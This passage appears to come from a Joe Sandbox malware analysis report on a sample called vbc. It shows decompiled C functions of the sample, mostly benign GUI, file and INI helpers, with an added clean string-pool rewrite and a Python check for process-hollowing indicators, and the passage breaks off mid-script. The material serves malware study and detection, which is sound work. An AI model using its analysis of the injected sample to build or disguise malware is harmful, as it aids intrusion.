	}
Instruction addresses: 0x00406680, 0x00406680, 0x00406680, 0x00406688, 0x0040668b, 0x0040668d, 0x0040668d, 0x0040668f, 0x00406693, 0x00406697, 0x0040669b, 0x004066a1, 0x004066a7, 0x004066aa, 0x004066b4, 0x004066bb, 0x004066be, 0x004066c1, 0x004066c8, 0x004066d7, 0x004066f5, 0x004066d9, 0x004066db, 0x004066e0, 0x004066e0, 0x004066e6, 0x004066f1, 0x004066f1

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FileNameSavestrcpy
• String ID: L
• API String ID: 1182090483-2909332022
• Opcode ID: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
• Instruction ID: a38c0b8f1c2b7ba0f1b8aa2faef71ae79cae630a3543d59e66951d479f2b4fd1
• Opcode Fuzzy Hash: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
• Instruction Fuzzy Hash: 7F0125B1E102199FDF00CFA9D8807AEBBF8FF08319F10442AE915E6280DBB88915CF44
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			/* Dialog helper. The stack frame holds an object whose first dword is 0x41300c
			   (a pointer into the image, vtable-like) and whose next field is set to 0x6c,
			   followed by four consecutive 0x105-byte (MAX_PATH + 1) string buffers. */
			E0040ADB3(void* __ebx, void* __eflags) {
				char _v265;        /* fourth 0x105-byte string buffer */
				char _v526;        /* third */
				char _v787;        /* second */
				void _v1048;       /* first; the four buffers total 0x414 bytes */
				void _v3648;
				intOrPtr _v3652;   /* field following the 0x41300c dword, set to 0x6c */
				char _v3660;       /* start of the object passed to E00401596 / E0040143D */
				void* _t30;

				_t30 = __ebx;      /* __ebx: caller's object; fields at +0x108 and +0x370 are used below */
				_v3660 = 0x41300c;
				memset( &_v3648, 0, 0x10);
				_v1048 = 0;
				_v787 = 0;
				_v526 = 0;
				_v265 = 0;
				_v3652 = 0x6c;
				/* Back up 0x414 bytes (four 0x105-byte strings) from *(this+0x370)+0xb20 onto the stack */
				memcpy( &_v1048,  *((intOrPtr*)(__ebx + 0x370)) + 0xb20, 0x105 << 2);
				/* E00401596 receives the object and the HWND stored at this+0x108. A nonzero result
				   restores the saved strings and calls E0040AD9D, which posts a window message (PostMessageA). */
				if(E00401596( &_v3660,  *((intOrPtr*)(__ebx + 0x108))) != 0) {
					E0040AD9D(memcpy( *((intOrPtr*)(__ebx + 0x370)) + 0xb20,  &_v1048, 0x105 << 2));
				}
				/* Return keyboard focus to the control whose HWND is stored at *(this+0x370)+0x184 */
				SetFocus( *( *((intOrPtr*)(_t30 + 0x370)) + 0x184));
				return E0040143D( &_v3660);   /* finalize the object before returning */
			}











Statement addresses: 0x0040adb3, 0x0040adc9, 0x0040add3, 0x0040ade7, 0x0040adee, 0x0040adf5, 0x0040adfc, 0x0040ae03, 0x0040ae1e, 0x0040ae2d, 0x0040ae4a, 0x0040ae4a, 0x0040ae5b, 0x0040ae6f

APIs
• memset.MSVCRT ref: 0040ADD3
• SetFocus.USER32(?,?), ref: 0040AE5B
  • Part of subcall function 0040AD9D: PostMessageA.USER32 ref: 0040ADAC
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FocusMessagePostmemset
• String ID: l
• API String ID: 3436799508-2517025534
• Opcode ID: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
• Instruction ID: a3aa1947760d1632b5ff20bf1b11b778d92a779fff19439862dc3abef3b95f30
• Opcode Fuzzy Hash: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
• Instruction Fuzzy Hash: 1011A1719002589BDF21AB14CC047CA7BAAAF80308F0804F5A94C7B292C7B55B88CFA9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			/* Save list-view column layout. __esi points at { short* columns; int count }.
			   For each column index the code sends LVM_GETCOLUMNA (0x1019) with
			   mask 0x22 = LVCF_WIDTH | LVCF_ORDER and stores the column width and
			   display order as two shorts, 4 bytes per column. The locals _v40.._v12
			   are the fields of the LVCOLUMNA struct that starts at _v40. */
			E00408441(void** __esi, struct HWND__* _a4) {
				long _v12;          /* LVCOLUMNA.iOrder (offset 0x1c) */
				signed int _v24;    /* LVCOLUMNA.cchTextMax (offset 0x10), zeroed */
				signed int _v28;    /* LVCOLUMNA.pszText (offset 0x0c), zeroed */
				short _v32;         /* LVCOLUMNA.cx, the column width (offset 0x08) */
				void* _v40;         /* LVCOLUMNA.mask (offset 0x00) */
				long _t17;
				short* _t23;
				int _t24;
				void** _t25;

				_t25 = __esi;
				_t24 = 0;           /* column index */
				if(_a4 != 0) {      /* _a4: list-view window handle */
					_t17 = memset( *__esi, 0, __esi[1] << 2);   /* clear count * 4 output bytes */
					if(__esi[1] > 0) {
						do {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							_t23 =  *_t25 + _t24 * 4;          /* 4-byte output slot for this column */
							_v40 = 0x22;                       /* LVCF_WIDTH | LVCF_ORDER */
							_t17 = SendMessageA(_a4, 0x1019, _t24,  &_v40);   /* LVM_GETCOLUMNA */
							if(_t17 != 0) {
								 *_t23 = _v32;                 /* width */
								_t17 = _v12;
								 *(_t23 + 2) = _t17;           /* order, in the following short */
							}
							_t24 = _t24 + 1;
						} while (_t24 < _t25[1]);
					}
				}
				return _t17;        /* result of the last SendMessageA / memset, or 0 if no HWND */
			}












Statement addresses: 0x00408441, 0x00408449, 0x0040844e, 0x0040845a, 0x00408465, 0x00408467, 0x00408469, 0x0040846d, 0x00408471, 0x00408481, 0x00408488, 0x00408490, 0x00408496, 0x00408499, 0x0040849d, 0x0040849d, 0x004084a1, 0x004084a2, 0x00408467, 0x00408465, 0x004084aa

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: MessageSendmemset
• String ID: "
• API String ID: 568519121-123907689
• Opcode ID: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
• Instruction ID: 3d4b9897b9e590d379032152458179bae83636b6f0047c21005e3f982915147a
• Opcode Fuzzy Hash: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
• Instruction Fuzzy Hash: 4F01D635900205AFDB20CF95C941EAFB7F8FF84759F10842EE891AA240E738DA85CB75
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			/* Open-file dialog wrapper around GetOpenFileNameA. The locals _v80.._v20 are the
			   fields of an OPENFILENAMEA struct that starts at _v80 (lStructSize 0x4c, the
			   pre-Windows 2000 size); the selected path is returned in the caller's __esi buffer. */
			E00406618(intOrPtr __eax, char* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v20;          /* lpstrDefExt       (+0x3c) */
				intOrPtr _v28;          /* Flags             (+0x34) */
				intOrPtr _v32;          /* lpstrTitle        (+0x30) */
				intOrPtr _v36;          /* lpstrInitialDir   (+0x2c) */
				intOrPtr _v44;          /* lpstrFileTitle    (+0x24) */
				intOrPtr _v48;          /* nMaxFile          (+0x20) */
				char* _v52;             /* lpstrFile         (+0x1c) */
				intOrPtr _v56;          /* nFilterIndex      (+0x18) */
				intOrPtr _v64;          /* lpstrCustomFilter (+0x10) */
				intOrPtr _v68;          /* lpstrFilter       (+0x0c) */
				intOrPtr _v76;          /* hwndOwner         (+0x04) */
				struct tagOFNA _v80;    /* lStructSize       (+0x00) */

				_v76 = __eax;           /* owner window */
				_v68 = _a4;             /* filter string */
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;             /* dialog title */
				_v80 = 0x4c;            /* sizeof(OPENFILENAMEA) without the Windows 2000 extension fields */
				_v56 = 1;
				_v52 = __esi;           /* caller's path buffer */
				_v48 = 0x104;           /* MAX_PATH */
				_v28 = 0x81804;         /* OFN_EXPLORER | OFN_FILEMUSTEXIST | OFN_PATHMUSTEXIST | OFN_HIDEREADONLY */
				_v20 = 0x413008;        /* default-extension string located in the image */
				if(GetOpenFileNameA( &_v80) == 0) {
					return 0;           /* user cancelled or the call failed */
				} else {
					strcpy(__esi, _v52);   /* lpstrFile is __esi itself, so this copies the buffer onto itself */
					return 1;
				}
			}

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FileNameOpenstrcpy
• String ID: L
• API String ID: 812585365-2909332022
• Opcode ID: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
• Instruction ID: 13dc2997c8553d865726dff807e233ea18e6c60b58d53e24b26ad6de5975139e
• Opcode Fuzzy Hash: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
• Instruction Fuzzy Hash: 5201B2B1D10218AFCF40DFA9D8456CEBFF8BB08308F00812AE519E6240E7B886458F98
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadMenuA.USER32 ref: 00407BC1
• sprintf.MSVCRT ref: 00407BE4
  • Part of subcall function 00407A64: GetMenuItemCount.USER32 ref: 00407A7A
  • Part of subcall function 00407A64: memset.MSVCRT ref: 00407A9E
  • Part of subcall function 00407A64: GetMenuItemInfoA.USER32 ref: 00407AD4
  • Part of subcall function 00407A64: memset.MSVCRT ref: 00407B01
  • Part of subcall function 00407A64: strchr.MSVCRT ref: 00407B0D
  • Part of subcall function 00407A64: strcat.MSVCRT(?,?,?,?,?,00000001,?), ref: 00407B68
  • Part of subcall function 00407A64: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00407B84
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Menu$Itemmemset$CountInfoLoadModifysprintfstrcatstrchr
• String ID: menu_%d
• API String ID: 3671758413-2417748251
• Opcode ID: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
• Instruction ID: 3be60505ea2565ef11dfa3f51dd36ce0e69a3f53bb310b440500eec60165980c
• Opcode Fuzzy Hash: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
• Instruction Fuzzy Hash: 9FD01D71A4D14037D72033356D09FCF19794BD3B15F5440A9F200722D1D57C5755857D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00406325(char* _a4) {

	if( *0x417550 == 0) {
		 *0x417658 = GetWindowsDirectoryA(0x417550, 0x104);
	}
	strcpy(_a4, 0x417550);
	return *0x417658;
}

APIs
• GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
• strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: DirectoryWindowsstrcpy
• String ID: PuA
• API String ID: 531766897-3228437271
• Opcode ID: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
• Instruction ID: dc620c75b08fae7ca861cc569808ec9e0c9c78cdcec5c9dc17d9b47d99426002
• Opcode Fuzzy Hash: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
• Instruction Fuzzy Hash: D2D0A77184E2907FE3015728BC45AC63FB5DB05330F10807BF508A25A0E7741C90879C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00408348(char* __esi) {
	char* _t2;
	char* _t6;

	_t6 = __esi;
	E00406160(__esi);
	_t2 = strrchr(__esi, 0x2e);
	if(_t2 != 0) {
		 *_t2 = 0;
	}
	return strcat(_t6, "_lng.ini");
}

APIs
  • Part of subcall function 00406160: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,0040834E,00000000,0040826C,?,00000000,00000104,?), ref: 0040616B
• strrchr.MSVCRT ref: 00408351
• strcat.MSVCRT(00000000,_lng.ini,00000000,00000104,?), ref: 00408366
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FileModuleNamestrcatstrrchr
• String ID: _lng.ini
• API String ID: 3097366151-1948609170
• Opcode ID: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
• Instruction ID: a8d2890f819e62600bf11f9c0364550bfc67884382c2ab22ce71db24782b6e2f
• Opcode Fuzzy Hash: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
• Instruction Fuzzy Hash: 37C01275686A5438D11622355E03B8F01454F52745F24409BF903391D6DE5D569141AE
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00403397(CHAR* _a4, CHAR* _a8, char _a12) {

	_t2 =  &_a12; // 0x403428
	return GetPrivateProfileStringA("Server Details", _a8, 0x412466,  *_t2, 0x7f, _a4);
}

APIs
• GetPrivateProfileStringA.KERNEL32(Server Details,?,Function_00012466,(4@,0000007F,?), ref: 004033AF
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: PrivateProfileString
• String ID: (4@$Server Details
• API String ID: 1096422788-3984282551
• Opcode ID: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
• Instruction ID: 5387a3ffe087b7673ef104c15d829f3f0df010b9e50aa15a0af8b6122c5a167a
• Opcode Fuzzy Hash: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
• Instruction Fuzzy Hash: A0C04031544301FAC5114F909F05E4D7F516B54B40F118415B24450065C1E54574DB26
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%
			// Constructor-style routine. It writes a vtable pointer (0x413320) into the
			// object, calls E00406549 on it (presumably the 0x1c8-byte clear; memset
			// appears in this function's API ID listed below), then allocates four
			// 0x14-byte sub-objects with operator new (L004115D0 is ??2@ in that API ID,
			// each call preceded by push 0x14) and stores them at this+4, +8, +0xc and
			// +0x10. Each sub-object is zeroed except its +0x10 field, which gets 0x100,
			// presumably an initial capacity consumed by the growth helper E004060FA.
			// The decompiler never shows operator new's return value landing in _t22, so
			// the null checks below read as if they test the E00406549 result; that lost
			// data flow is likely why the quality is reported as 88%.
			E004084CE(intOrPtr* __esi, void* __eflags) {
				intOrPtr* _t22;
				intOrPtr* _t31;

				_t31 = __esi;
				 *__esi = 0x413320;                       // vtable pointer
				_t22 = E00406549(0x1c8, __esi);          // initialise the 0x1c8-byte object
				_push(0x14);
				L004115D0();                              // operator new(0x14): sub-object 1
				if(_t22 == 0) {
					_t22 = 0;
				} else {                                  // zero five dwords, +0x10 = 0x100
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 4)) = _t22;        // this+4 = sub-object 1
				L004115D0();                              // operator new(0x14): sub-object 2
				if(_t22 == 0) {
					_t22 = 0;
				} else {                                  // same initialisation as above
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 8)) = _t22;        // this+8 = sub-object 2
				L004115D0();                              // operator new(0x14): sub-object 3
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 0xc)) = _t22;      // this+0xc = sub-object 3
				L004115D0();                              // operator new(0x14): sub-object 4
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				 *((intOrPtr*)(_t31 + 0x10)) = _t22;     // this+0x10 = sub-object 4
				return _t31;                              // returns this
			}

			Instruction address column for E004084CE (0x004084ce through 0x00408571): in the original report one address sits beside each decompiled statement; the column is collapsed to its range here.

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                    • Opcode ID: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                                                                                                                    • Instruction ID: 33d46294e57da76ea2c08804649fae6184d1477937e8cd9eb119e1572679ad16
                                                                                                                                                    • Opcode Fuzzy Hash: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                                                                                                                    • Instruction Fuzzy Hash: F321B3B0A01300AED7518F2B9945955FBE4FF94355B2AC8AFD149DB2B2EBB8C8408F14
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 100%
			// Appends the NUL-terminated string _a4 to a growable string pool and returns
			// its index. Layout as used here: this+4 = bytes in use, this+0x10 = byte
			// buffer, this+0x14 = its capacity, this+0xc = table of start offsets (dwords),
			// this+0x18 = its capacity, this+0x1c = entry count. E004060FA is the grow
			// helper (it calls malloc, see APIs below). The 0xffffffff branches free the
			// buffer instead of growing it: a sentinel comparison on an already wrapped
			// length, not an overflow check. Note also that the second E004060FA call
			// passes the current count while offsets[count] is written afterwards; whether
			// that is an off-by-one depends on how the helper sizes its allocation, which
			// is not shown here. _t25 and _t53 are used below but were left undeclared by
			// the decompiler; they are declared here.
			E00406A74(void* __eax, void* __ecx, char* _a4) {
				int _v8;
				void* __edi;
				intOrPtr _t25;
				int _t27;
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t42;
				intOrPtr _t52;
				intOrPtr _t53;
				void** _t55;
				void** _t56;
				void* _t59;

				_t59 = __eax;                                  // this
				_t27 = strlen(_a4);
				_t42 =  *((intOrPtr*)(_t59 + 4));              // bytes in use = start of new string
				_t52 = _t42 + _t27 + 1;                        // new size including the NUL
				_v8 = _t27;
				_t28 =  *((intOrPtr*)(_t59 + 0x14));           // byte buffer capacity
				 *((intOrPtr*)(_t59 + 4)) = _t52;
				_t55 = _t59 + 0x10;                            // &byte buffer
				if(_t52 != 0xffffffff) {
					E004060FA(_t59, _t52, _t55, 1, _t28);      // grow byte buffer (element size 1)
				} else {
					free( *_t55);
				}
				_t53 =  *(_t59 + 0x1c);                        // entry count
				_t31 =  *((intOrPtr*)(_t59 + 0x18));           // offset table capacity
				_t56 = _t59 + 0xc;                             // &offset table
				if( *(_t59 + 0x1c) != 0xffffffff) {
					E004060FA(_t59 + 8, _t53, _t56, 4, _t31);  // grow offset table (element size 4)
				} else {
					free( *_t56);
				}
				memcpy( *(_t59 + 0x10) + _t42, _a4, _v8);      // copy string at the old end
				 *((char*)( *(_t59 + 0x10) + _t42 + _v8)) = 0; // terminate it
				 *((intOrPtr*)( *_t56 +  *(_t59 + 0x1c) * 4)) = _t42;  // offsets[count] = start
				 *(_t59 + 0x1c) =  *(_t59 + 0x1c) + 1;         // count++
				_t25 =  *(_t59 + 0x1c) - 1; // -1
				return _t25;                                   // index of the new entry
			}
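The two listings above (E004084CE allocating and seeding the sub-objects, E00406A74 appending a string) are easier to follow as the data structure they implement. What follows is an added example written for this page, not code from the sample, from the decompiler or from Joe Sandbox: a clean C rendering of that string pool. The struct field names, the mapping to the sample's offsets in the comments, the initial capacity of 0x100, the doubling growth policy and the input strings are my assumptions or choices (only "Server Details" occurs elsewhere in this report; "smtp.example.invalid" and the 300-byte filler are constructed); E004060FA's real growth policy is not shown in the report. Unlike the sample's 0xffffffff branches, the example refuses an append whose length would wrap the 32-bit size instead of freeing the buffer.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
/* Growable pool of NUL-terminated strings plus a table of their start offsets:
 * my reading of the object E004084CE sets up and E00406A74 appends to. Field
 * names and the "sample:" offsets are inferred from the decompilation above. */
typedef struct {
    char     *data;     /* byte buffer      (sample: this+0x10) */
    uint32_t  used;     /* bytes in use     (sample: this+0x04) */
    uint32_t  cap;      /* buffer capacity  (sample: this+0x14) */
    uint32_t *offsets;  /* start offsets    (sample: this+0x0c) */
    uint32_t  count;    /* strings stored   (sample: this+0x1c) */
    uint32_t  off_cap;  /* offsets capacity (sample: this+0x18) */
} string_pool;

#define POOL_INIT_CAP 0x100u  /* the 0x100 E004084CE stores in each sub-object */

/* Make buf hold `need` elements of `elem` bytes; returns the (maybe new) buffer
 * or NULL with the old one intact. Stands in for E004060FA (malloc, copy, free)
 * but refuses to wrap instead of freeing the buffer. Doubling is my choice. */
static void *pool_grow(void *buf, uint32_t *cap, uint32_t need, size_t elem)
{
    if (buf != NULL && need <= *cap)
        return buf;
    uint32_t ncap = *cap ? *cap : POOL_INIT_CAP;
    while (ncap < need) {
        if (ncap > UINT32_MAX / 2)
            return NULL;
        ncap *= 2;
    }
    void *nbuf = malloc((size_t)ncap * elem);
    if (nbuf == NULL)
        return NULL;
    if (buf != NULL) {
        memcpy(nbuf, buf, (size_t)*cap * elem);
        free(buf);
    }
    *cap = ncap;
    return nbuf;
}

void pool_init(string_pool *p)
{
    memset(p, 0, sizeof *p);              /* zero the object, then seed the */
    p->cap = p->off_cap = POOL_INIT_CAP;  /* capacities, as E004084CE does */
}

/* Append s and return its index, or -1 on allocation failure or overflow.
 * E00406A74 bumps count and returns count-1, which is the same index. */
int pool_append(string_pool *p, const char *s)
{
    size_t len = strlen(s);
    /* used+len+1 must fit in 32 bits; the sample only tests for 0xffffffff */
    if (len >= (size_t)(UINT32_MAX - p->used) || p->count == UINT32_MAX)
        return -1;
    uint32_t start = p->used, need = start + (uint32_t)len + 1;
    char *d = pool_grow(p->data, &p->cap, need, 1);
    if (d == NULL)
        return -1;
    p->data = d;
    uint32_t *o = pool_grow(p->offsets, &p->off_cap, p->count + 1, sizeof(uint32_t));
    if (o == NULL)
        return -1;
    p->offsets = o;
    memcpy(p->data + start, s, len);      /* copy at the old end, terminate, */
    p->data[start + len] = '\0';          /* record the start offset */
    p->offsets[p->count] = start;
    p->used = need;
    return (int)p->count++;
}

const char *pool_get(const string_pool *p, uint32_t idx)
{
    return idx < p->count ? p->data + p->offsets[idx] : NULL;
}

void pool_free(string_pool *p) { free(p->data); free(p->offsets); memset(p, 0, sizeof *p); }

/* Round trip on constructed input, including a 300-byte string that pushes the
 * buffer past its initial 0x100 bytes; returns the count stored, or -1. */
int pool_roundtrip_demo(void)
{
    static char longstr[301];             /* [300] stays NUL */
    memset(longstr, 'A', 300);
    const char *in[] = { "Server Details", "", "smtp.example.invalid", longstr };
    string_pool p;
    pool_init(&p);
    int ok = 1;
    for (size_t i = 0; ok && i < sizeof in / sizeof in[0]; i++) {
        int idx = pool_append(&p, in[i]);
        ok = idx == (int)i && strcmp(pool_get(&p, (uint32_t)idx), in[i]) == 0;
    }
    ok = ok && pool_get(&p, 99) == NULL && p.used == 15 + 1 + 21 + 301;
    int n = (int)p.count;
    pool_free(&p);
    return ok ? n : -1;
}
```

pool_roundtrip_demo() returns 4 on the constructed input; the fourth string forces the byte buffer from 0x100 to 0x200 bytes, which is the path the sample's 0xffffffff branch sits beside. One deliberate difference from the listing: the example grows the offset table to count+1 entries before writing offsets[count], whereas E00406A74 passes the current count to E004060FA, so whether the sample depends on that helper rounding up cannot be settled from the decompilation alone.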

			Instruction address column for E00406A74 (0x00406a7e through 0x00406b0c): in the original report one address sits beside each decompiled statement; the column is collapsed to its range here.

                                                                                                                                                    APIs
                                                                                                                                                    • strlen.MSVCRT ref: 00406A80
                                                                                                                                                    • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AA0
                                                                                                                                                      • Part of subcall function 004060FA: malloc.MSVCRT ref: 00406116
                                                                                                                                                      • Part of subcall function 004060FA: memcpy.MSVCRT ref: 0040612E
                                                                                                                                                      • Part of subcall function 004060FA: free.MSVCRT(00000000,00000000,75144DE0,00406B49,00000001,?,00000000,75144DE0,00406D88,00000000,?,?), ref: 00406137
                                                                                                                                                    • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AC3
                                                                                                                                                    • memcpy.MSVCRT ref: 00406AE3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
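The dump file name above encodes where this disassembly came from. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it splits the .sdmp name into fields and checks the region's properties against the process-hollowing footprint the report attributes to this sample. The field layout (PID, phase, timestamp, base, protection, state, type, reserved) is an assumption inferred from the sample names on this page and is not documented here; only the protection and type fields are interpreted, and only against winnt.h constants. The "benign" second name is constructed for contrast and does not appear in the report.

```python
# Added example (not from the Joe Sandbox report): decode the .sdmp file name
# cited under "Memory Dump Source" and flag properties matching the
# process-hollowing footprint the report attributes to this sample.
from dataclasses import dataclass
from typing import List

# winnt.h constants (these values are certain).
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000
DEFAULT_IMAGE_BASE_32 = 0x400000  # linker default for 32-bit EXEs


@dataclass
class DumpRegion:
    pid: int
    phase: int
    base: int
    protect: int
    mem_type: int
    based_on_pe: bool = False


def parse_dump_name(name: str, based_on_pe: bool = False) -> DumpRegion:
    """Split 'PID.PHASE.TS.BASE.PROTECT.STATE.TYPE.RSV.sdmp' into a DumpRegion.

    ASSUMPTION: this field layout is inferred from the sample file names in
    the report, not documented by Joe Sandbox; only PROTECT and TYPE are
    interpreted, and only against winnt.h values. 'based_on_pe' comes from
    the report text ("based on PE: true"), not from the file name.
    """
    stem = name[:-5] if name.endswith(".sdmp") else name
    fields = stem.split(".")
    if len(fields) != 8:
        raise ValueError(f"expected 8 dot-separated fields, got {len(fields)}: {name!r}")
    if not all(f and all(c in "0123456789abcdefABCDEF" for c in f) for f in fields):
        raise ValueError(f"non-hex field in {name!r}")
    pid, phase, _ts, base, protect, _state, mem_type, _rsv = fields
    return DumpRegion(
        pid=int(pid, 16), phase=int(phase, 16), base=int(base, 16),
        protect=int(protect, 16), mem_type=int(mem_type, 16),
        based_on_pe=based_on_pe,
    )


def hollowing_indicators(region: DumpRegion) -> List[str]:
    """Reasons why a dumped region looks like a hollowed or injected image.

    A legitimately loaded module is MEM_IMAGE (a file-backed section) and its
    code pages are execute-read, not writable. A PE header living in private,
    writable+executable memory at the default image base is the footprint of
    process hollowing, which the report flags for this sample.
    """
    reasons = []
    if region.protect == PAGE_EXECUTE_READWRITE:
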